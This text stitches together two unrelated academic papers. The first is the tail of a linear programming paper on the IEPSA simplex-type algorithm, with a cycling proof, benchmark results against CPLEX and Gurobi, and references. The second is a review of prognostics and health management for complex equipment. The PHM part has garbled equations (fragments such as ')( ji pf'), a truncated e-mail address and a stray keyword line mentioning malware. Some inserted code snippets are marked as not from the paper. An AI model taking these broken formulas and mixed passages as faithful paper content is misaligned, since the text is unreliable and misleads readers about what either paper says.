Figure: Pivot type II (set Q). The reduced costs over P are negative but the corresponding pivot-row entries are non-negative; the entering column has s_l ≥ 0 and a negative pivot element; the leaving variable x_k is negative.

Proof: When the selection is done from the sets P and Q respectively, and since

P = { j ∈ N : s_j < 0 } and Q = { j ∈ N : s_j ≥ 0 },

we have (via the positivity of the leaving variable on the adjacent basic solution, shown in the previous lemma):

P ⇒ Δz = z′ − z = s_l x_l = (−)(+) < 0,
Q ⇒ Δz = z′ − z = s_l x_l = (+)(+) > 0.

The sign properties proved previously result in the unique pair of pivot types depicted in the two figures above. To select an entering variable from the set Q (thus a pivot of type II) automatically means that either h_rP ≥ 0 or P = Ø.

Lemma: The selection of the entering variable for IEPSA is well defined.

In Fukuda & Terlaky three types of terminal tableau for a linear problem are defined. These are considered terminal because they define three different terminal states for an LP: (i) optimality, (ii) primal inconsistency, (iii) dual inconsistency.
We emphasize the second one, shown here: a tableau with a negative basic variable whose entire pivot row over the non-basic columns is non-positive (− ⊖ ··· ⊖).

Proof: Notice that since the leaving variable x_k = x_B(r) is always negative for IEPSA, and Fukuda & Terlaky use d = −(A_B)^{-1} A_N, this tableau version has opposite signs to what IEPSA uses for the pivot row (h_rN = (A_B)^{-1}_r A_N). We know that IEPSA selects an entering variable with h_rN = [h_rP h_rQ] < 0, thus the pivot row of this terminal tableau matches the case where h_rN ≥ 0 for IEPSA. This would be a deadlock for IEPSA, a case where no eligible entering variable could be detected (all pivot elements positive or zero). As a result, this terminal tableau cannot occur at IEPSA run time, since IEPSA is only applicable to feasible LPs, as it requires an initial interior point to initialize, and this terminal tableau reveals infeasibility of the primal problem.

Following the insight of what is stated in Fukuda & Terlaky, we will now prove that IEPSA can never reach a deadlock, a case where the method would be forced to cycle. We first need a definition.

Definition: We call a constraint of an LP redundant if it represents geometrically a half-space already implied by other constraint(s). Thus a redundant constraint can be eliminated from the original LP without altering its initial feasible region.

Theorem: Method IEPSA cannot reach a cycling deadlock.

Proof: The near-terminal tableau of type B, as shown in Fukuda & Terlaky, actually means that the entering variable represents a redundant constraint. In terms of the IEPSA sign properties this translates into: (i) a negative leaving variable x_k, and (ii) a pivot row h_rN = (A_B)^{-1}_r A_N ≥ 0 except for the entering variable x_l, which gives (h_rN)_l < 0. This means that only one entering variable is eligible. We now move on to proving that the vector h_rN cannot contain only one negative element in the general case of cycling. The cycling example that we will analyze is minimal; each variable in the cycle becomes entering and leaving only once.

Figure: Near-terminal tableau of type B (the pivot row is non-negative except for the entering column; the leaving variable is negative).

This near-terminal tableau means that the constraint represented by the variable l is a redundant constraint for the primal problem. Let us assume the general case, where cycling occurred as shown in the figure "The general case of cycling". For simplicity, we depict basic solutions as nodes in a graph. Each oriented arrow represents an admissible pivot for IEPSA except for the one(s) in red. A cycling assumption implies a case where the algorithm began on a basic solution, say node 1, moved after a finite number of pivots to node n and then again to 1, thus producing a cycle. All variables involved in the cycle changed basic/non-basic status at least once. Assume the pivot 1 → n is given by the pivot operation (x_k, s_l), where k is the index of the leaving variable and l the index of the entering one. The step n → 1 was admissible by the algorithm, so the sign properties apply: on basic solution 1 we have x_k > 0, and of course on n we have x_l < 0. It is now also clear that 1 → n cannot be admissible for
the algorithm (although 1 and n are obviously neighbors), via the pivot-irreversibility lemma above. However, somewhere before visiting node n, the variable k changed status and left the basis (in order to be eligible as entering on the last node n). Now, since the algorithm always selects leaving variables through a max-ratio test, it is obvious that all leaving variables correspond to hyperplanes of the feasible region. Thus all leaving variables selected by the algorithm are non-redundant, as removing any of them would result in a new LP that would not be equivalent to the previous one. If we assume that there is only one pivot admissible by the sign properties of the algorithm on node n (that is, moving to 1), this means that the tableau of that pivot has a negative leaving variable and there is only one negative element in the pivot row h_rN. However, according to Fukuda & Terlaky, this is a near-terminal tableau of type B. It means that the constraint that the entering variable represents is a redundant one for the primal problem. Since the entering variable k on n is already known to have been leaving in some previous iteration, and all leaving variables are non-redundant in this algorithm, this is a contradiction.
This near-terminal tableau of type B can therefore never appear for an entering variable that has previously served as a leaving one. As shown in the figure "The general case of cycling", from n the algorithm can either move to 1 (n → 1) or to 2; since n is a neighbor of 1 and 1 is a neighbor of 2, n is potentially a neighbor of 2. If it were not a neighbor, the pivot would not be admissible anyhow, so a case of cycling could not be assumed. Additionally, node n − 1 is excluded because, via the pivot-irreversibility lemma, the backwards pivot is non-admissible since the forward one was. The direct backwards pivot n → n − 1 is not possible via the same lemma. So the algorithm could, in theory, cycle only through node 2 now. We extract the following scenario, depicted in the figure below: the pivots 1 → 2, n → 1 and n → 2 in the case of cycling are all admissible. Via the pivot lemma, we know that the leaving variable is always negative and is always substituted by a positive one on the pivot. Since 1 → 2 is admissible, x_k ≤ 0 there. Since n → 1 is also admissible, x_k ≤ 0 there as well. But in the pivot n → 2, the variable k must be substituted at node 2 with a positive variable, and the substitution here is by x_k itself. However, since 1 → 2 is admissible, again x_k ≤ 0 must apply; a contradiction. This case could only take place if 1 → 2 and n → 2 were admissible pivots but the pivot element for n → 2 were positive, which is not applicable for IEPSA, so that the returning variable k could again be negative. This means that the pivot n → 2 is non-admissible for IEPSA in both directions if this applies.

Figure: The general case of cycling.

Figure: Supposing cycling was possible even for the only second alternative entering variable, this scheme must apply.

Results

Computational studies can provide preliminary results on the computational behavior of an algorithm, thus enabling us to gain insight into its performance on different types of LPs. The most popular types of test instances available for computational experiments are instances from real-world applications. The test bed used in the computational study was a set of benchmark problems (Netlib, Kennington, Mészáros) that do not have BOUNDS and RANGES sections in their .mps files. All reported times were measured in seconds with the built-in function cputime. The computing environment used in the computational study is described in the corresponding table, using the most up-to-date possible software versions. The results table presents detailed information about the computational study: the first column includes the name of the problem, the second the number of constraints, the third the number of variables, the fourth the nonzero elements of the matrix A, and then the triplets of results for all three algorithms in terms of CPU time and total number of iterations follow. Finally, the last three columns contain the optimal objective value reported by each algorithm. The test bed includes LPs from the Netlib, Kennington and Mészáros collections. Ordóñez & Freund have shown that a considerable percentage of the Netlib LPs are ill-conditioned, hence numerical difficulties may occur. We implemented an MPS parser to read the MPS files and convert the data into MATLAB .mat files. The proposed algorithm (IEPSA) was implemented in the MathWorks MATLAB environment. The main reason for this choice was the support for high-level sparse matrix operations.
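A small, hypothetical example of how one of the converted benchmarks could be loaded and inspected in MATLAB is given below. The file name and the field names A, b and c are assumptions about the .mat layout and are not taken from the paper.

```matlab
% load one converted benchmark (hypothetical file produced by the MPS-to-MAT step)
S = load('adlittle.mat');
A = sparse(S.A);  b = S.b(:);  c = S.c(:);    % keep the constraint matrix sparse
[m, n]  = size(A);
density = 100 * nnz(A) / (m * n);             % percentage of nonzeros, as reported in the results table
fprintf('adlittle: %d rows, %d columns, %.2f%% nonzeros\n', m, n, density);
```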
Four programming adjustments were used to improve the performance of memory-bound code in MATLAB: (i) store and access data in columns, (ii) avoid creating unnecessary variables, (iii) use vectorization instead of for-loops, and (iv) pre-allocate arrays before accessing them within loops. In order to handle numerical errors, tolerance scalars were introduced; their default values were set to the same small value for all vectors and matrices in IEPSA. For the basis update of IEPSA, EPSA and PDIPSA we used the MATLAB LU factorization scheme. Furthermore, to obtain the first (and only) interior point for IEPSA we used a MATLAB interface, under a MEX-function, provided for the MOSEK IPM (Andersen & Andersen; Andersen & Ye). This interface allowed us to modify the IPM appropriately so as to stop the solver directly after finding the first interior point. We emphasize that we used a zero objective function vector with MOSEK; as a result the MOSEK IPM is agnostic of directions pointing towards any existing optimal solutions. In this way, the claim that the first interior point we construct already brings IEPSA very close to the optimal solution is at least unsubstantiated. The pipeline representing how the total running times were calculated for the competing algorithms is shown in the corresponding figure. We did not need any scaling technique to solve all tested benchmarks successfully, as the EPSA pivoting scheme is scaling invariant (Triantafyllidis & Samaras).

Table: Description of the computing environment (CPU: Intel Xeon, multi-core; RAM: DDR memory; cache; operating system: Windows Pro; MATLAB release; MOSEK interior-point method; CPLEX primal simplex, ILOG Optimization Studio; Gurobi primal simplex).

In the results table we present the arithmetic mean (a_mean) computed for both the total CPU time (in seconds) and the number of iterations (niter). We present the execution time and the number of iterations of each algorithm over the included Netlib, Kennington and Mészáros LPs. We compare the performance of the proposed new algorithm (IEPSA) against CPLEX (primal simplex), using its default settings and forcing the suite to use the primal simplex (as IEPSA also solves the primal problem), and against Gurobi (primal simplex) using the same method as well. The proposed algorithm performs fewer iterations than CPLEX and than Gurobi on many of the tested benchmarks; in terms of the average number of iterations, IEPSA performs fewer iterations than both CPLEX and Gurobi. In terms of CPU time, the commercial solvers required on average less time than IEPSA to solve all tested instances. Even though the difference between IEPSA and the commercial solvers is substantial, it is worth noting that M-code (IEPSA) is significantly slower than pure C implementations (the MEX-functions of CPLEX and Gurobi), so this outcome is to be expected in this computational study. However, the average number of iterations is independent of the programming language used and relies only on the algorithmic mechanics of each solver. Therefore, it can be a transparent criterion to gain insight into the practical performance of the competing algorithms.
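The implementation notes above mention an LU-based basis update and tolerance scalars. The fragment below is a minimal sketch of that idea on random sparse data; the tolerance value and the basis choice are illustrative assumptions, not the paper's settings.

```matlab
% LU-based basis solve with a simple tolerance guard (illustrative only)
tol  = 1e-9;                             % illustrative tolerance, not the paper's exact value
rng(0);
A    = sprandn(6, 8, 0.5) + speye(6, 8); % random sparse data for the sketch
b    = randn(6, 1);
Bidx = 1:6;                              % a hypothetical basis index set
AB   = A(:, Bidx);

[L, U, P, Q] = lu(AB);                   % sparse LU with row and column permutations
xB = Q * (U \ (L \ (P * b)));            % solves A_B * xB = b without forming inv(A_B)
xB(abs(xB) < tol) = 0;                   % snap tiny entries to zero to limit round-off noise
```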
Also, the violin-plot figure shows the total number of iterations for all three algorithms across all tested benchmarks, stratified by three levels of sparsity. Finally, differences in the optimal value between the solvers have been observed for the problems of the largeXXX family. This has to do with the very nature of these problems, where numerical instability is highly present. IEPSA, though, tends to agree completely with the CPLEX objective values.

Conclusions

In this paper we proposed a new non-monotonic simplex-type algorithm for solving LPs. IEPSA does not maintain monotonicity on the basic solutions but only on the interior-point solutions. The new algorithm is a combination of three different methods. The computational results are very encouraging for the new algorithm: IEPSA performs fewer iterations on average than both CPLEX and Gurobi on a collection of well-known benchmarks. Future work includes the extension of the computational studies to a larger number of tested problems from the available benchmark collections, improving the CPU-time performance by implementing the algorithms in a low-level programming language and, finally, implementing a tailored method to compute the first interior point rather than using a commercial IPM.

Table: Computational results on a selection of well-known benchmark LPs. For each benchmark the table reports the number of rows, the number of columns, the sparsity, the CPU time in seconds and the number of iterations (niter) for CPLEX, IEPSA and Gurobi, and the objective value reported by each algorithm; the last row gives the arithmetic mean (a_mean). The test bed includes, among others, adlittle, afiro, agg, bandm, baxter, beaconfd, blend, bnl, brandy, cep, cr, cre_a, cre_c, degen, e, fffff, fxm, iiasa, israel, the large* family, lotfi, multi, nemscem, nsic, nug, nw, osa, the p* set, refine, rlfddd, rlfprim, route, sc, scagr, scfxm, scorpion, scrs, scsd, sctap, share b, ship s, slptsk and stocfor.
Figure: The pipeline showing how we gradually construct an appropriate .mat file (MATLAB data file) to input to the competing algorithms, and which segment of the pipeline was taken into account when calculating their total CPU running times.

Figure: Violin plots of the number of iterations, stratified by sparsity, for all algorithms.

Acknowledgements

A prodigious debt of gratitude goes to the memory of K. Paparrizos for the introduction, inspiration and collaboration in the field of linear programming and operations research. We also wish to deeply thank John N. Tsitsiklis for the insightful comments during the development of this work.

Additional Information and Declarations

Funding
The authors received no funding for this work.

Competing Interests
The authors declare there are no competing interests.

Author Contributions
• Charalampos P.
Triantafyllidis performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
• Nikolaos Samaras conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft.

Data Availability
The following information was supplied regarding data availability: the data are available at GitHub: https://github.com/harrytr/iepsa_ .

References

Amin GR, Emrouznejad A. Optimizing search engines results using linear programming. Expert Systems with Applications.
Andersen ED, Andersen KD. The MOSEK interior point optimizer for linear programming: an implementation of the homogeneous algorithm. In: Frenk H, Roos K, Terlaky T, Zhang S, eds. High Performance Optimization. Boston: Springer US.
Andersen ED, Ye Y. Combining interior-point and pivoting algorithms for linear programming. Management Science.
Arsham H. A hybrid gradient and feasible direction pivotal solution algorithm for general linear programs. Applied Mathematics and Computation.
Basu A, De Loera JA, Junod M. On Chubanov's method for linear programming. INFORMS Journal on Computing.
Bertsimas D, Tsitsiklis JN. Introduction to Linear Optimization. Belmont: Athena Scientific.
Bixby RE, Gregory JW, Lustig IJ, Marsten RE, Shanno DF. Very large-scale linear programming: a case study in combining interior point and simplex methods. Operations Research.
Bixby RE, Saltzman MJ. Recovering an optimal LP basis from an interior point solution. Operations Research Letters.
Burdett RL, Kozan E, Sinnott M, Cook D, Tian YC. A mixed integer linear programing approach to perform hospital capacity assessments. Expert Systems with Applications.
Dantzig GB. Programming of interdependent activities: II Mathematical model. Econometrica.
Dongarra J, Sullivan F. Guest editors introduction: the top algorithms. Computing in Science & Engineering.
Elhallaoui I, Metrane A, Desaulniers G, Soumis F. An improved primal simplex algorithm for degenerate linear programs. INFORMS Journal on Computing.
Fernández S, Borrajo D. Using linear programming to solve clustered oversubscription planning problems for designing e-courses. Expert Systems with Applications.
Fukuda K, Terlaky T. Criss-cross methods: a fresh view on pivot algorithms. Mathematical Programming.
Gkioulekas I, Papageorgiou LG. Piecewise regression analysis through information criteria using mathematical programming. Expert Systems with Applications.
Glavelis T, Ploskas N, Samaras N. Improving a primal-dual simplex-type algorithm using interior point methods. Optimization.
Gleixner AM, Steffy DE, Wolter K. Iterative refinement for linear programming. INFORMS Journal on Computing.
Illes T, Terlaky T. Pivot versus interior point methods: pros and cons.
European Journal of Operational Research.
Janssens GK, Ramaekers KM. A linear programming formulation for an inventory management decision problem with a service constraint. Expert Systems with Applications.
Jurik T. A nearest point approach algorithm for a class of linear programming problems. Journal of Applied Mathematics, Statistics and Informatics (JAMSI).
Karmarkar N. A new polynomial-time algorithm for linear programming. In: Proceedings of the Sixteenth Annual ACM Symposium on Theory of Computing (STOC). New York: ACM.
Khachiyan LG. A polynomial algorithm in linear programming. Doklady Akademii Nauk SSSR.
Klee V, Minty GJ. How good is the simplex algorithm? In: Shisha O, ed. Inequalities, Vol. III. New York: Academic Press.
Li W. Dual-primal algorithm for linear optimization. Optimization Methods and Software.
Mehrotra S. On the implementation of a primal-dual interior point method. SIAM Journal on Optimization.
Mehrotra S. Quadratic convergence in a primal-dual method. Mathematics of Operations Research.
Murty K, Fathi Y. A feasible direction method for linear programming. Operations Research Letters.
Omer J, Rosat S, Raymond V, Soumis F. Improved primal simplex: a more general theoretical framework and an extended experimental analysis. INFORMS Journal on Computing.
Ordóñez F, Freund RM. Computational experience and the explanatory value of condition measures for linear optimization. SIAM Journal on Optimization.
Pan PQ. A largest-distance pivot rule for the simplex algorithm. European Journal of Operational Research.
Pan PQ. An affine-scaling pivot algorithm for linear programming. Optimization.
Paparrizos K. An infeasible (exterior point) simplex algorithm for assignment problems. Mathematical Programming.
Paparrizos K. An exterior point simplex algorithm for (general) linear programming problems. Annals of Operations Research.
Paparrizos K. A new primal and dual pivoting rule for the simplex algorithm. In: Proceedings of SYMOPIS.
Paparrizos K, Samaras N, Sifaleras A. Exterior point simplex-type algorithms for linear and network optimization problems. Annals of Operations Research.
Paparrizos K, Samaras N, Stephanides G. An efficient simplex type algorithm for sparse and dense linear programs. European Journal of Operational Research.
Paparrizos K, Samaras N, Stephanides G. A new efficient primal dual simplex algorithm. Computers and Operations Research.
Paparrizos K, Samaras N, Triantafyllidis C. A computational study of exterior point simplex algorithm variations. In: Conference of the Hellenic Operational Research Society (EEEE), Spetses, Greece.
Paparrizos K, Samaras N, Tsiplidis K. Pivoting algorithms for linear programming generating two paths. In: Floudas CA, Pardalos PM, eds. Encyclopedia of Optimization, 2nd edition. Boston: Springer.
Samaras N. Computational improvements and efficient implementation of two path pivoting algorithms. PhD thesis, Department of Applied Informatics, University of Macedonia.
Terlaky T. A convergent criss-cross method. Optimization.
Terlaky T, Zhang S. Pivot rules for linear programming: a survey on recent theoretical developments. Annals of Operations Research.
Triantafyllidis C, Samaras N. Three nearly scaling-invariant versions of an exterior point algorithm for linear programming. Optimization: A Journal of Mathematical Programming and Operations Research.
Triantafyllidis CP, Papageorgiou LG. An integrated platform for intuitive mathematical programming modeling using LaTeX. PeerJ Computer Science.
Yang L, Liu S, Tsoka S, Papageorgiou LG. Mathematical programming for piecewise linear regression analysis. Expert Systems with Applications.
Yeh WC, Corley HW. A simple direct cosine simplex algorithm. Applied Mathematics and Computation.
Zhang S. New variants of finite criss-cross pivot algorithms for linear programming. European Journal of Operational Research.

A Review on Prognostics and Health Management

International Conference on Sensor Network and Computer Engineering (ICSNCE)

Nannan Hu, Xiaohao Su and Baolong Liu
School of Computer Science and Engineering, Xi'an Technological University, Xi'an, China
E-mail: @qq.com; su-xiaohao@foxmail.com; liu.bao.long@hotmail.com

Abstract: The health management of complex equipment is crucial to ensuring the reliability, maintainability and safety of complex equipment. This paper introduces the basic concept and research connotation of prognostics and health management (PHM) and analyzes the significance of PHM technology in equipment maintenance. The fault prediction architecture and methods are discussed and analyzed in detail, and the current research hot spots and existing technical difficulties are summarized. Finally, future research directions are also outlined.

Keywords: malware... (not applicable); fault prognostics; health management; fault diagnosis; remaining life
I. Introduction

With the rapid development of modern technologies, especially information technologies, the complexity, integration and intelligence of a large number of complex systems are constantly increasing, and the costs of research, production and, especially, maintenance and support are increasing as well. At the same time, due to the growing number of components and influencing factors, the probability of faults and functional failures gradually increases. Therefore, the fault diagnosis and maintenance of complex systems have gradually become a focus of researchers, and PHM is gaining more and more attention. The concept of PHM first appeared in military equipment and then obtained applications in complex systems and equipment such as spacecraft, aircraft and nuclear reactors. With the continuous development of PHM technology, it has gradually been adopted by many industrial fields such as electronics, automobiles, ships and the safety of engineering structures, and its applications keep increasing. PHM is a further extension of the built-in test (BIT) and health-monitoring capabilities used for complex systems. It is a shift from state monitoring to health management: identifying and managing the occurrence of faults, and planning maintenance and supply assurance. The main purpose is to reduce maintenance costs, improve equipment safety and mission success, and achieve condition-based maintenance (CBM) and autonomous support with less maintenance input.

II. Connotation of PHM

A. The basic concept of PHM
PHM contains two aspects: fault prognostics and health management. Health refers to the performance degradation or deviation compared with the expected normal performance state. Fault prognostics refers to predicting, based on the current or historical performance state of the system, its future condition, including determining the remaining life of the system or the length of time it is expected to keep working. Health management is the ability to make appropriate decisions based on diagnostic and prognostic information, available maintenance resources and usage requirements. PHM represents a shift in approach, maintenance strategy and concept that enables a move from traditional sensor-based diagnostics to prognostics based on intelligent systems, so as to provide accurate technical support at the right time. PHM technology also allows corrective or periodic maintenance strategies to be replaced by condition-based maintenance. This change can bring the following improvements to actual equipment support:
• provide advance warning of system failures;
• provide condition-based maintenance capability;
• improve the availability of the system by extending maintenance cycles;
• reduce the full life-cycle cost by reducing inspection costs and downtime;
• reduce the occurrence of intermittent faults and no-fault-founds (NFF).

B. Connotation of PHM
In terms of system function, PHM can achieve state monitoring, fault detection, failure prediction and remaining-life prognostics of key components or systems; it is a combination of multiple frontier and interdisciplinary techniques. In the evolution of the technology, it is an improvement of traditional equipment condition monitoring and fault diagnosis, emphasizing the discovery of early signs before a failure occurs, tracking the development of fault symptoms while assessing the remaining useful life of the equipment, and ultimately providing decision support for equipment maintenance.
The health degradation process of a device is a process in which the device's health status changes from normal to degraded until its function fails, as illustrated in Fig. 1.

Figure 1. Equipment health degradation process (equipment health level over time, marking the failure-occurrence detection point, the current status point and the function failure point, the normal, degraded-performance and failure stages, and the remaining life).

In view of this typical equipment health degradation process, the fault prognostics system should have early fault detection capabilities and should monitor the degradation process. Fault prognostics research includes the following aspects:
• Evaluate which health condition the device is currently in within its health degradation process: a normal state, a degraded-performance state, or a functional-failure state.
• When the equipment is in a degraded-performance state, judge what kind of failure mode causes its health level to drop, and evaluate how far the current state of health deviates from the normal state.
• Predict the future state of health of the equipment. This has two forms: (1) study whether the equipment can fulfill its functional requirements normally over a period of time in the future; (2) study the remaining life of the equipment.

III. System Application of PHM

A. PHM's framework
PHM systems should generally be capable of fault detection, fault isolation, enhanced diagnostics, performance testing, fault prognostics, health management, and component life tracking. Most fault diagnosis and fault prognostics tools have domain-related features. The PHM technical system framework is shown in Fig. 2.

Figure 2. Framework for PHM (sensing and pre-processing, signal-characteristic analysis, FMECA, historical and operational status data, maintenance task resources, feature extraction, signal processing, fault classification, prognostics and prediction of failure evolution, current fault status, maintenance planning and CBM).

The method system of PHM technology is shown in Fig. 3. Firstly, the virtual life is evaluated: through the input of design data, expected life-cycle operating conditions, failure modes, mechanisms and effects analysis (FMMEA) and physics-of-failure (PoF) models, a reliability (or virtual life) evaluation is achieved. FMECA is of great significance for the selection of design schemes and for the objective evaluation of relevant measures and test equipment, and at the same
if there is no problem (such as temperature, degree of vacuum, normal pressure, etc.) through the detection or monitor, then it is no longer necessary to take the fmea analysis for the root cause of fault. design data expectation of life fmmca pof model virtual life assessment sensor data already available bus monitoring data maintain and test records system health status and pre-diagnosis status prediction of life loss based on pof failure signs early warning monitoring remaining life assessment full life cycle assurance and cost analysis figure . general methodology of phm [ ]. by performing a virtual life assessment, the major failure modes and failure mechanisms to be prioritized can be determined. existing sensor data, monitoring data, maintenance and inspection records can also be used to identify abnormal conditions and parameters. in the entire methodological system, prediction is the core method and research content to achieve system performance degradation status and remaining life prediction. b. fault prognostic model design of phm phm is a new system maintenance and management philosophy that significantly improves the understanding of the behavior of complex systems through comprehensive fault detection, isolation and prognostic and state management [ ]. at the same time, information on key components is also collected and processed to prognostic the remaining useful life. the realization of fault prognostics mainly depends on the model design. in view of the complicated system of phm, it is urgent to develop and design a general prognostic framework to select and integrate the appropriate methods of diagnosis and prediction. improve the utilization of information, and achieve multi-angle and multi-parameter prognostic, improve the level of diagnosis and prognostics [ ]. in order to accurately predict a fault before it occurs, it is necessary to capture the symptom of the fault by monitoring the change of the system state parameter. for a slowly changing fault, before the near failure occurs, the rate of change of the system state parameter usually increases sharply. therefore, it is the key to successfully predicting failures by reasonably determining the critical point of state change that is about to occur. first, based on the results of signal analysis, the analysis of the root cause of the failure, and the extension of fmeca results, the correlation equations between the model parameters i  (describe the overall state of the system) and the physical parameters j p (describe subsystems and part properties) is established as follows: )( ji pf ( ) estimating signal input and output parameter from the measurement, the estimated model parameter i  to calculate the actual physical parameters: )( i fp    ( ) determine the change of the actual physical parameter p relative to the nominal physical parameter value p [ ]. p is a reflection of the operational status of the equipment, whether the system is abnormal operating status, the size of the anomalies. they can be real-time described by p ’s value and changes. when setting up the correlation equation )( ji pf , the limit value should be international conference on sensor network and computer engineering (icsnce ) set to the value at the performance of the system suddenly begins to change drastically. 
observe the value of p in real time, according to the changes of p (whether exceed the critical value), as well as changes in the physical parameters, the corresponding relationship between the decision-making, to determine whether the failure will occur. finally, the use of statistical decisions or hypothesis testing, fault separation, to determine the impending failure causes, size and type [ ]. in addition, after the fault symptoms have been identified, fault trends should be analyzed to quantify the time since the device state was abruptly changed to the time when fault to occur. fault trends are closely related to the material properties, design, and structural characteristics of the equipment or component. so the speed and trend of fault development can be described by computer simulation. the relationship between the remaining life of the system and the running status and running time can finally be expressed in the form of a three-dimensional surface. fault prognostics output characteristic surface simulate as fig. . the x-axis represents time, the y-axis represents p that reflects the working status, and the z-axis represents the remaining life of the part or system. this figure can intuitively and accurately represent the remaining life of any part or system that corresponds to any operating state and any operating time point. figure . fault prediction output characteristic surface map. iv. algorithm of fault prognostic according to the theories, methods and technical routes applied in the actual research, the fault prognostics technology can be divided into three types [ - ]: as shown in fig. below: the prognostic techniques are divided into three categories: ( ) model-driven fault prognostics techniques; ( ) data-driven fault prognostics techniques; ( ) fault prognostics techniques based on statistical reliability (probability-based); the three methods in the engineering application of the extensive weakened in order, but the prognostics accuracy risen, the difficulty and cost associated with it also increased [ - ]. the following is a brief introduction to all kinds of forecasting methods. figure . algorithms of fault prognostics.. a. model-driven fault pragnostics techniques model-driven fault prognostic is a technique using either a dynamic model or process prognostics method. physical model approach, kalman/extended kalman filter/particle filter and expert-based methods can be classified in model-driven fault prognostics [ ]. model- based fault prognostics techniques generally require the mathematical models of the object system to be known. such methods provide a means of grasping the failure mode process of the component or system being predicted. by calculating the functional impairment under system operating conditions, to assess the loss of critical components and to assess the cumulative effects of failures in the use of the international conference on sensor network and computer engineering (icsnce ) components over the life, to evaluate the remaining useful life by integrating physical models with stochastic process modeling distribution. model-based fault prognostics techniques have the property of being able to penetrate the nature of the object system and the advantages of real-time. adams [ ] put forward the damage accumulation model of the first/second order nonlinear differential equation in the structural dynamic system. chelidze [ ] expressed the model of the performance degradation in the slow process; the process corresponds with time-varying. 
chelidze's model was used to track battery degradation (voltage). in [ ], a non-linear stochastic model is proposed to model the mechanical structure; the model uses a generalized kalman filter to estimate the current fault condition of the system in real time and to predict the remaining life of the system. the literature [ - ] introduced residual life estimation based on two defect propagation models for a bearing-loaded mechanical model. luo [ ] proposed a data-based synthetic forecasting process using model-based simulation data under nominal and degraded conditions. at present, most model-based methods are used in electromechanical systems such as aircraft and rotating machinery. for complex electronic systems, the failure mechanisms are relatively complicated, so the modeling of fault prognostics lags behind. b. data-driven fault prognostics techniques compared with regression analysis and time series analysis [ ] from the traditional statistical category, the neural network is one of the most widely used methods in fault prognostic research and applications. unlike model-based methods, neural networks are data-driven approaches that are self-adaptive, can learn from samples, and try to capture the intrinsic functional relationships within the sample data. zhang and ganesan [ ] applied a self-organizing neural network to multivariate trend forecasting and to the prognostics of the remaining life of a bearing system. reference [ ] used recurrent neural networks (rnn) to predict system fault trends. as research progresses, many improved or special forms of neural network algorithms have emerged, such as wavelet neural networks (wnn) and fuzzy neural networks (fnn); these improved neural network algorithms have also achieved good results in fault diagnosis and prognostics. data-driven fault prognostic technology does not need prior knowledge (a mathematical model or expert experience) of the object system; based on the collected data, hidden information can be obtained through various data analysis and processing methods to prognosticate the operation. by avoiding the shortcomings of model- and knowledge-based fault prognostics technology, it has become a more practical fault prognostics method. however, typical data (historical operating data, fault injection data, and simulation experiment data) for some key devices are usually very expensive to obtain in practice, and even then the data are often highly uncertain and incomplete; these problems all increase the difficulty of realizing fault prognostic technology. c. fault prognostics techniques based on statistical reliability this method requires less detail than model-based methods, because the information needed for the prognostic is contained in a series of different probability density functions (pdfs), without the need for dynamic differential equations. the advantage of this approach is that the required pdfs can be obtained by analyzing the statistics, and the resulting pdfs can provide sufficient support for the prognostic. in addition, the prognostic given by this method contains a confidence level, which can also characterize the prognostic result well. the typical fault probability curve based on statistical reliability is the famous "bathtub curve", as shown in fig. : the failure rate is relatively high at the beginning of the operation of the equipment or system; after a period of stable operation, the failure rate can generally be maintained at a relatively low level; and then, after a further period of operation, the failure rate starts to increase again, until all parts or equipment have failed.
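to illustrate (this example is not from the paper), a bathtub-shaped failure rate can be approximated by superimposing weibull hazard functions with shape parameters below, equal to, and above one; the parameter values below are arbitrary assumptions.

import numpy as np

# illustrative sketch: a bathtub-shaped failure rate built from three
# weibull hazard terms h(t) = (beta/eta) * (t/eta)**(beta - 1).
# beta < 1: early failures, beta = 1: constant rate, beta > 1: wear-out.
def weibull_hazard(t, beta, eta):
    return (beta / eta) * (t / eta) ** (beta - 1)

def bathtub_hazard(t):
    early = weibull_hazard(t, beta=0.5, eta=50.0)     # decreasing term
    random = weibull_hazard(t, beta=1.0, eta=200.0)   # constant term
    wearout = weibull_hazard(t, beta=3.0, eta=120.0)  # increasing term
    return early + random + wearout

t = np.linspace(1.0, 150.0, 6)
for ti, hi in zip(t, bathtub_hazard(t)):
    print(f"t={ti:6.1f}  hazard={hi:.4f}")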
equipment production characteristics, historical changes, performance degradation and other life-cycle factors make fault prognostics based on system characteristics more complicated. all of these factors have a certain probabilistic impact on the prognostic results. the false alarm rate of fault prognostics also needs to be reduced. d. comparison of fault prognostic algorithms based on a survey of the literature, the commonly used prognostic algorithms are summarized in table i:
table i. algorithms of fault prognostics (algorithm | content | advantages | disadvantages)
time domain analysis | directly uses the waveform | can directly show the different signals | the amount of information that can be provided is relatively small
fourier transform | the signal is decomposed into sinusoidal waves of different frequencies to obtain the frequency domain | suitable for stationary signals; enables frequency-domain analysis of the signal | cannot analyze in real time; poor performance on non-stationary signals
principal component analysis | transforms the original data into uncorrelated feature data in order to reduce the amount of data | reduces the dimensionality of the original data while retaining its information | linear transformation; applicability is not strong
fisher linear discriminant | finds a mapping that reduces the original data to the minimum dimension | reduces data to the lowest dimension while maintaining data resolution | linear dimensionality reduction only
gaussian mixture model | fusion of multiple gaussian probability density functions | can approximate any segment with arbitrary precision | the parameter selection has a great influence on the predictive power of the model
kalman filter | recursive estimation under the linear, unbiased, minimum-variance criterion | little computation; high prognostic accuracy; good robustness | only for linear systems; a system measurement model must first be established
neural networks | simulate the human nervous system and establish the input/output relationship by training on known data | good applicability to complex systems (including non-linear, non-stationary processes) | need a lot of training data; no uniform standard for selecting the network structure
expert system | build a computer program with a great deal of expertise and experience to make predictions | can constantly modify the original knowledge or learn new knowledge | building the knowledge base requires long-term accumulation
fuzzy technology | prognosticates the relationship between fault symptoms and fault causes | suitable for systems with little data and no accurate model; closer to a person's judgment process | needs a fairly accurate membership function; low accuracy
v. phm outlook at present, china's national science and technology industry has a strong demand for phm technology. drawing on and absorbing advanced foreign experience, the study of key phm technologies can provide the basic technical reserve for the development of a new generation of weapons and equipment in our country, lay the foundation for engineering application, and better promote the rapid development of china's national industry. work should focus on the following five aspects.
